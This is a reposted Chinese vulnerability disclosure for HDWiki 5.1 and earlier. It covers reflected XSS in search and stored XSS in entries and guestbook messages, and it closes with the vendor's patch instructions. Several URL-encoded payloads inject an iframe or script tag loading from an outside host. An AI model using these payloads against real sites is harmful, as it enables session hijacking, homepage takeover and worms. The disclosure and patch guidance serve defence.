当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

互动维客HDWiki(5.1及以下)各种xss 0day

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

可csrf、劫持首页、蠕虫等,cog也在其列。
详细说明:由于偶尔原因发现cog存在wiki导致的xss可劫持首页,发现它的wiki是hdwiki的5.1版本。于是测试了其他的hdwiki发现存在同样的xss问题。
问题总结如下。
1. hdwiki的搜索有非持久xss,如:
/index.php?search-fulltext-title-%5C%22%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1

 



/index.php?search-fulltext-title-%5C%22%3E%3Cscript%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%2Fq%26%2346%3Bjs%3E--all-0-within-time-desc-1
/index.php?search-fulltext-title-TAG%3A%5C%22%3E%5C%27%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1

 


2. hdwiki编辑词条的存储型xss,涛涛电脑知识网,
/index.php?doc-view-1572
/thread-625-1-1.html
词条标题,词条标签,词条内容均存在服务端未过滤的问题。

 

 

 

3. hdwiki留言的存储型xss

 修复方案:

过滤各种提交,www.xuhantao.com,修复编辑器,打补丁。
作者 random_

官方修复方案:

漏洞1、hdwiki编辑词条的存储型xss 漏洞
2、hdwiki的搜索有非持久xss 漏洞
3、HDWiki 任意用户密码修改漏洞
修复前须知:请提前做好代码备份工作,如您有做过二次开发,请对比代码,谨慎处理。
修复步骤:
1、请下载您对应编码版本的附件补丁包到本地并解压
2、拷贝附件中的doc.php,user.php,reference.php至/control/下面(覆盖原有文件)
3、(此步骤只针对HDWiki5.1版本的用户)拷贝附件中的editor.htm,viewdoc.htm至/view/default/下(覆盖原有文件)
4、拷贝附件中的hdwiki.js至/js/jqeditor/下(覆盖原有文件)
5、(此步骤只针对5.0UTF8版本的用户)拷贝附件中的install.php至/install/下(覆盖原有文件)
帖子内容如下: ?tid=115225&extra=page%3D1

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1